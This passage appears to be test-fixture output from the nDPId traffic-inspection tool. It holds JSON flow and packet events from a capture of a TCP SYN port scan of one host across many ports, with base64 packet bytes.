-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsekUAAC8Gny2sEAAIQA2GNIzTH5bdU4MZAAAAAGACEAAI9gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsvlsAAC0GXResEAAIQA2GNIzTBILdU4MZAAAAAGACCAAsCgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsLE8AACYG9iOsEAAIQA2GNIzTBfTdU4MZAAAAAGACDAAmmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs4LEAADcGMMGsEAAIQA2GNIzTBoLdU4MZAAAAAGACEAAiCgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsgKkAACgGn8msEAAIQA2GNIzTBD\/dU4MZAAAAAGACBAAwTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsqWEAADIGbRGsEAAIQA2GNIzTHnjdU4MZAAAAAGACDAAOFAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsfMoAACYGpaisEAAIQA2GNIzTTUTdU4MZAAAAAGACDADfRwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs+oEAACwGIfGsEAAIQA2GNIzTEA\/dU4MZAAAAAGACBAAkfQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsn\/4AACkGf3SsEAAIQA2GNIzTatzdU4MZAAAAAGACCADFrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs32IAADoGLxCsEAAIQA2GNIzTFUDdU4MZAAAAAGACDAAXTAAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAswOYAAC0GWoysEAAIQA2GNIzTAGPdU4MZAAAAAGACCAAwKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAspGsAACYGfgesEAAIQA2GNIzTBBDdU4MZAAAAAGACDAAofAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs6bIAACsGM8CsEAAIQA2GNIzTFqjdU4MZAAAAAGACEAAR5AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsNOsAACwG54esEAAIQA2GNIzTD6XdU4MZAAAAAGACBAAk5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5wAACgGYNasEAAIQA2GNIzTBI7dU4MZAAAAAGACBAAv\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAspqkAADMGbsmsEAAIQA2GNIzTBTDdU4MZAAAAAGACEAAjXAAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvjkAACUGZTmsEAAIQA2GNIzTAAndU4MZAAAAAGACCAAwgwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAs1ygAAC8GQkqsEAAIQA2GNIzTrdXdU4MZAAAAAGACEAB6tgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsiLIAACsGlMCsEAAIQA2GNIzSC5jdUoMYAAAAAGACEAAc9wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfMAADkGcX+sEAAIQA2GNIzSC13dUoMYAAAAAGACCAAlMgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsz0EAACkGUDGsEAAIQA2GNIzSCVndUoMYAAAAAGACCAAnNgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsLKEAADEG6tGsEAAIQA2GNIzSBC7dUoMYAAAAAGACCAAsYQAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsduwAACUGrIasEAAIQA2GNIzSAP7dUoMYAAAAAGACCAAvkQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsXOUAADIGuY2sEAAIQA2GNIzSDsjdUoMYAAAAAGACDAAdxwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 